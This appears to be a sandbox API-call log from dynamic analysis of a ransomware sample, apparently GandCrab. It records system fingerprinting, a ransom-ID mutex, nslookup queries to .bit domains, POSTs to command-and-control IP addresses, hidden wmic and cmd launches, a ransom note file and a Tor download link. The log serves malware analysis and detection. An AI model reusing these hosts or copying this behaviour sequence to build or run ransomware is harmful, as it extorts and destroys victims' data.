Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
System Sleep duration = 50 milliseconds (0.050 seconds) True 3
Fn
Window Create class_name = MyMainWnd, wndproc_parameter = 0 True 1
Fn
Window Set Attribute class_name = MyMainWnd, index = 18446744073709551600, new_long = 1421869056 True 1
Fn
System Sleep duration = 100 milliseconds (0.100 seconds) True 1
Fn
Thread 0xf08
2 0
»
Category Operation Information Success Count Logfile
Window Create class_name = MyMainWnd, wndproc_parameter = 0 True 1
Fn
System Sleep duration = 50 milliseconds (0.050 seconds) True 1
Fn
Thread 0xf0c
95 35
»
Category Operation Information Success Count Logfile
System Sleep duration = 1000 milliseconds (1.000 seconds) True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters, value_name = Domain, data = 0 True 1
Fn
System Get Info type = Windows Directory, result_out = C:\Windows True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = ProcessorNameString, data = 73 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = Identifier, data = 73 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77c40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x77c66b10 True 1
Fn
Mutex Create mutex_name = Global\pc_group=WORKGROUP&ransom_id=dce1bb8bd2ca4def True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters, value_name = Domain, data = 0 True 1
Fn
System Get Info type = Windows Directory, result_out = C:\Windows True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = ProcessorNameString, data = 73 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = Identifier, data = 73 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77c40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x77c66b10 True 1
Fn
System Get Time type = Ticks, time = 117046 True 1
Fn
System Get Computer Name result_out = LHNIWSJ True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters, value_name = Domain, data = 0 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Control Panel\International True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Control Panel\International, value_name = LocaleName, data = 101 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Keyboard Layout\Preload True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Keyboard Layout\Preload, value_name = 1, data = 48 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Keyboard Layout\Preload True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Keyboard Layout\Preload, value_name = 2, data = 48 False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion, value_name = productName, data = 87 True 1
Fn
System Get Info type = Hardware Information True 1
Fn
System Get Info type = Windows Directory, result_out = C:\Windows True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = ProcessorNameString, data = 73 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = Identifier, data = 73 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77c40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x77c66b10 True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Close Session - True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = ipv4bot.whatismyipaddress.com, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Add HTTP Request Headers headers = Host: carder.bit True 1
Fn
Inet Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = ipv4bot.whatismyipaddress.com/ True 1
Fn
Inet Read Response size = 10238, size_out = 14 True 1
Fn
Data
Inet Read Response size = 10238, size_out = 0 True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Module Get Filename process_name = c:\users\ciihmnxmn6ps\desktop\2018-05-22_13-47-32.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\2018-05-22_13-47-32.exe, size = 256 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Desktop\2018-05-22_13-47-32.exe, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\Desktop\2018-05-22_13-47-32.exe, type = size True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Desktop\2018-05-22_13-47-32.exe, size = 326665, size_out = 326665 True 1
Fn
Data
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77c40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x77c66b10 True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
File Create Pipe pipe_name = Anonymous read pipe, size = 0 True 1
Fn
File Create Pipe pipe_name = Anonymous read pipe, size = 0 True 1
Fn
Process Create process_name = nslookup carder.bit ns1.wowservers.ru, os_pid = 0xf24, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE True 1
Fn
File Read size = 4096, size_out = 35 True 1
Fn
Data
System Sleep duration = 1000 milliseconds (1.000 seconds) True 1
Fn
File Create Pipe pipe_name = Anonymous read pipe, size = 0 True 1
Fn
File Create Pipe pipe_name = Anonymous read pipe, size = 0 True 1
Fn
Process Create process_name = nslookup ransomware.bit ns2.wowservers.ru, os_pid = 0x5c8, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE True 1
Fn
File Read size = 4096, size_out = 311 True 1
Fn
Data
Inet Close Session - True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = 46.139.176.151, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = steazaei?deay=owster, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Add HTTP Request Headers headers = Host: carder.bit True 1
Fn
Inet Send HTTP Request headers = Content-Type: application/x-www-form-urlencoded, url = 46.139.176.151/steazaei?deay=owster True 1
Fn
Data
Inet Read Response size = 204798, size_out = 552 True 1
Fn
Data
Inet Read Response size = 204798, size_out = 0 True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77c40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x77c66b10 True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Ticks, time = 139953 True 1
Fn
System Sleep duration = -1 (infinite) True 1
Fn
System Get Time type = Ticks, time = 179078 True 2
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters, value_name = Domain, data = 0 True 1
Fn
System Get Info type = Windows Directory, result_out = C:\Windows True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = ProcessorNameString, data = 73 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = Identifier, data = 73 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77c40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x77c66b10 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77c40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x77c66b10 True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
File Create Pipe pipe_name = Anonymous read pipe, size = 0 True 1
Fn
File Create Pipe pipe_name = Anonymous read pipe, size = 0 True 1
Fn
Process Create process_name = nslookup carder.bit ns1.wowservers.ru, os_pid = 0xcb8, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE True 1
Fn
File Read filename = C:\\CRAB-DECRYPT.txt, size = 4096, size_out = 411 True 1
Fn
Inet Close Session - True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = 86.101.230.109, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = zaeafau, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Add HTTP Request Headers headers = Host: carder.bit True 1
Fn
Inet Send HTTP Request headers = Content-Type: application/x-www-form-urlencoded, url = 86.101.230.109/zaeafau True 1
Fn
Data
Inet Read Response size = 204798, size_out = 0 True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CheckTokenMembership, address_out = 0x779af8d0 True 1
Fn
System Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Process Create process_name = C:\Windows\system32\wbem\wmic.exe, show_window = SW_HIDE True 1
Fn
Module Get Filename process_name = c:\users\ciihmnxmn6ps\desktop\2018-05-22_13-47-32.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\2018-05-22_13-47-32.exe, size = 256 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CheckTokenMembership, address_out = 0x779af8d0 True 1
Fn
System Get Time type = Ticks, time = 192562 True 1
Fn
System Get Time type = Ticks, time = 193984 True 1
Fn
File Create filename = C:\Users\CIIHMN~1\AppData\Local\Temp\\pidor.bmp, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIIHMN~1\AppData\Local\Temp\\pidor.bmp, size = 14 True 1
Fn
File Write filename = C:\Users\CIIHMN~1\AppData\Local\Temp\\pidor.bmp, size = 40 True 1
Fn
File Write filename = C:\Users\CIIHMN~1\AppData\Local\Temp\\pidor.bmp, size = 5184000 True 1
Fn
Module Get Filename process_name = c:\users\ciihmnxmn6ps\desktop\2018-05-22_13-47-32.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\2018-05-22_13-47-32.exe, size = 256 True 1
Fn
Process Create process_name = cmd.exe, show_window = SW_HIDE True 1
Fn
Process Create process_name = https://www.torproject.org/download/download-easy.html.en, show_window = SW_SHOW False 1
Fn
Thread 0xf10
544 0
»
Category Operation Information Success Count Logfile
Driver Enumerate load_addresses = 1703688 True 1
Fn
Driver Enumerate load_addresses = 3735552 True 1
Fn
Driver Get Name load_address = 3250606080 True 1
Fn
Driver Get Name load_address = 3259330560 True 1
Fn
Driver Get Name load_address = 3235078144 True 1
Fn
Driver Get Name load_address = 3872587776 True 1
Fn
Driver Get Name load_address = 3873177600 True 1
Fn
Driver Get Name load_address = 3856662528 True 1
Fn
Driver Get Name load_address = 3857121280 True 1
Fn
Driver Get Name load_address = 3857317888 True 1
Fn
Driver Get Name load_address = 3857448960 True 1
Fn
Driver Get Name load_address = 3857514496 True 1
Fn
Driver Get Name load_address = 3857580032 True 1
Fn
Driver Get Name load_address = 3857645568 True 1
Fn
Driver Get Name load_address = 3858300928 True 1
Fn
Driver Get Name load_address = 3858694144 True 1
Fn
Driver Get Name load_address = 3859152896 True 1
Fn
Driver Get Name load_address = 3859349504 True 1
Fn
Driver Get Name load_address = 3860004864 True 1
Fn
Driver Get Name load_address = 3860922368 True 1
Fn
Driver Get Name load_address = 3861053440 True 1
Fn
Driver Get Name load_address = 3861250048 True 1
Fn
Driver Get Name load_address = 3861315584 True 1
Fn
Driver Get Name load_address = 3861970944 True 1
Fn
Driver Get Name load_address = 3862560768 True 1
Fn
Driver Get Name load_address = 3862626304 True 1
Fn
Driver Get Name load_address = 3862757376 True 1
Fn
Driver Get Name load_address = 3862822912 True 1
Fn
Driver Get Name load_address = 3862953984 True 1
Fn
Driver Get Name load_address = 3863019520 True 1
Fn
Driver Get Name load_address = 3863412736 True 1
Fn
Driver Get Name load_address = 3863478272 True 1
Fn
Driver Get Name load_address = 3863609344 True 1
Fn
Driver Get Name load_address = 3863740416 True 1
Fn
Driver Get Name load_address = 3863937024 True 1
Fn
Driver Get Name load_address = 3864461312 True 1
Fn
Driver Get Name load_address = 3864592384 True 1
Fn
Driver Get Name load_address = 3864985600 True 1
Fn
Driver Get Name load_address = 3865116672 True 1
Fn
Driver Get Name load_address = 3865313280 True 1
Fn
Driver Get Name load_address = 3865837568 True 1
Fn
Driver Get Name load_address = 3865968640 True 1
Fn
Driver Get Name load_address = 3866099712 True 1
Fn
Driver Get Name load_address = 3866361856 True 1
Fn
Driver Get Name load_address = 3866689536 True 1
Fn
Driver Get Name load_address = 3868917760 True 1
Fn
Driver Get Name load_address = 3868983296 True 1
Fn
Driver Get Name load_address = 3870228480 True 1
Fn
Driver Get Name load_address = 3870752768 True 1
Fn
Driver Get Name load_address = 3890085888 True 1
Fn
Driver Get Name load_address = 3892576256 True 1
Fn
Driver Get Name load_address = 3893035008 True 1
Fn
Driver Get Name load_address = 3893231616 True 1
Fn
Driver Get Name load_address = 3893886976 True 1
Fn
Driver Get Name load_address = 3873439744 True 1
Fn
Driver Get Name load_address = 3873767424 True 1
Fn
Driver Get Name load_address = 3874029568 True 1
Fn
Driver Get Name load_address = 3874160640 True 1
Fn
Driver Get Name load_address = 3874684928 True 1
Fn
Driver Get Name load_address = 3875864576 True 1
Fn
Driver Get Name load_address = 3875995648 True 1
Fn
Driver Get Name load_address = 3876061184 True 1
Fn
Driver Get Name load_address = 3876126720 True 1
Fn
Driver Get Name load_address = 3876192256 True 1
Fn
Driver Get Name load_address = 3876323328 True 1
Fn
Driver Get Name load_address = 3876454400 True 1
Fn
Driver Get Name load_address = 3878486016 True 1
Fn
Driver Get Name load_address = 3878617088 True 1
Fn
Driver Get Name load_address = 3878748160 True 1
Fn
Driver Get Name load_address = 3878813696 True 1
Fn
Driver Get Name load_address = 3879010304 True 1
Fn
Driver Get Name load_address = 3879075840 True 1
Fn
Driver Get Name load_address = 3879403520 True 1
Fn
Driver Get Name load_address = 3880058880 True 1
Fn
Driver Get Name load_address = 3880189952 True 1
Fn
Driver Get Name load_address = 3880386560 True 1
Fn
Driver Get Name load_address = 3880517632 True 1
Fn
Driver Get Name load_address = 3881041920 True 1
Fn
Driver Get Name load_address = 3881631744 True 1
Fn
Driver Get Name load_address = 3881697280 True 1
Fn
Driver Get Name load_address = 3881762816 True 1
Fn
Driver Get Name load_address = 3881828352 True 1
Fn
Driver Get Name load_address = 3881893888 True 1
Fn
Driver Get Name load_address = 3882221568 True 1
Fn
Driver Get Name load_address = 3882483712 True 1
Fn
Driver Get Name load_address = 3882614784 True 1
Fn
Driver Get Name load_address = 3882680320 True 1
Fn
Driver Get Name load_address = 3882811392 True 1
Fn
Driver Get Name load_address = 3882942464 True 1
Fn
Driver Get Name load_address = 3883335680 True 1
Fn
Driver Get Name load_address = 3883532288 True 1
Fn
Driver Get Name load_address = 3883991040 True 1
Fn
Driver Get Name load_address = 3884122112 True 1
Fn
Driver Get Name load_address = 3885694976 True 1
Fn
Driver Get Name load_address = 3885760512 True 1
Fn
Driver Get Name load_address = 3885826048 True 1
Fn
Driver Get Name load_address = 3885891584 True 1
Fn
Driver Get Name load_address = 3886415872 True 1
Fn
Driver Get Name load_address = 3886481408 True 1
Fn
Driver Get Name load_address = 3886940160 True 1
Fn
Driver Get Name load_address = 3887005696 True 1
Fn
Driver Get Name load_address = 3887136768 True 1
Fn
Driver Get Name load_address = 3887333376 True 1
Fn
Driver Get Name load_address = 3887464448 True 1
Fn
Driver Get Name load_address = 3887529984 True 1
Fn
Driver Get Name load_address = 3887661056 True 1
Fn
Driver Get Name load_address = 3887726592 True 1
Fn
Driver Get Name load_address = 3887792128 True 1
Fn
Driver Get Name load_address = 3887988736 True 1
Fn
Driver Get Name load_address = 3888250880 True 1
Fn
Driver Get Name load_address = 3888578560 True 1
Fn
Driver Get Name load_address = 309460992 True 1
Fn
Driver Get Name load_address = 301989888 True 1
Fn
Driver Get Name load_address = 305725440 True 1
Fn
Driver Get Name load_address = 3888709632 True 1
Fn
Driver Get Name load_address = 3888775168 True 1
Fn
Driver Get Name load_address = 307167232 True 1
Fn
Driver Get Name load_address = 307232768 True 1
Fn
Driver Get Name load_address = 3889299456 True 1
Fn
Driver Get Name load_address = 3889496064 True 1
Fn
Driver Get Name load_address = 3889627136 True 1
Fn
Driver Get Name load_address = 3889758208 True 1
Fn
Driver Get Name load_address = 3889889280 True 1
Fn
Driver Get Name load_address = 3874816000 True 1
Fn
Driver Get Name load_address = 3882090496 True 1
Fn
Driver Get Name load_address = 3885170688 True 1
Fn
Driver Get Name load_address = 3870949376 True 1
Fn
Driver Get Name load_address = 3885367296 True 1
Fn
Driver Get Name load_address = 3894280192 True 1
Fn
Driver Get Name load_address = 3871408128 True 1
Fn
Driver Get Name load_address = 3871735808 True 1
Fn
Driver Get Name load_address = 3872456704 True 1
Fn
Driver Get Name load_address = 3906994176 True 1
Fn
Driver Get Name load_address = 3907321856 True 1
Fn
Driver Get Name load_address = 3907518464 True 1
Fn
Driver Get Name load_address = 3908304896 True 1
Fn
Driver Get Name load_address = 3908894720 True 1
Fn
Driver Get Name load_address = 3896508416 True 1
Fn
Driver Get Name load_address = 3896901632 True 1
Fn
Driver Get Name load_address = 3897032704 True 1
Fn
Driver Get Name load_address = 3897753600 True 1
Fn
Driver Enumerate load_addresses = 1703688 True 1
Fn
Driver Enumerate load_addresses = 3735552 True 1
Fn
Driver Get Name load_address = 3250606080 True 1
Fn
Driver Get Name load_address = 3259330560 True 1
Fn
Driver Get Name load_address = 3235078144 True 1
Fn
Driver Get Name load_address = 3872587776 True 1
Fn
Driver Get Name load_address = 3873177600 True 1
Fn
Driver Get Name load_address = 3856662528 True 1
Fn
Driver Get Name load_address = 3857121280 True 1
Fn
Driver Get Name load_address = 3857317888 True 1
Fn
Driver Get Name load_address = 3857448960 True 1
Fn
Driver Get Name load_address = 3857514496 True 1
Fn
Driver Get Name load_address = 3857580032 True 1
Fn
Driver Get Name load_address = 3857645568 True 1
Fn
Driver Get Name load_address = 3858300928 True 1
Fn
Driver Get Name load_address = 3858694144 True 1
Fn
Driver Get Name load_address = 3859152896 True 1
Fn
Driver Get Name load_address = 3859349504 True 1
Fn
Driver Get Name load_address = 3860004864 True 1
Fn
Driver Get Name load_address = 3860922368 True 1
Fn
Driver Get Name load_address = 3861053440 True 1
Fn
Driver Get Name load_address = 3861250048 True 1
Fn
Driver Get Name load_address = 3861315584 True 1
Fn
Driver Get Name load_address = 3861970944 True 1
Fn
Driver Get Name load_address = 3862560768 True 1
Fn
Driver Get Name load_address = 3862626304 True 1
Fn
Driver Get Name load_address = 3862757376 True 1
Fn
Driver Get Name load_address = 3862822912 True 1
Fn
Driver Get Name load_address = 3862953984 True 1
Fn
Driver Get Name load_address = 3863019520 True 1
Fn
Driver Get Name load_address = 3863412736 True 1
Fn
Driver Get Name load_address = 3863478272 True 1
Fn
Driver Get Name load_address = 3863609344 True 1
Fn
Driver Get Name load_address = 3863740416 True 1
Fn
Driver Get Name load_address = 3863937024 True 1
Fn
Driver Get Name load_address = 3864461312 True 1
Fn
Driver Get Name load_address = 3864592384 True 1
Fn
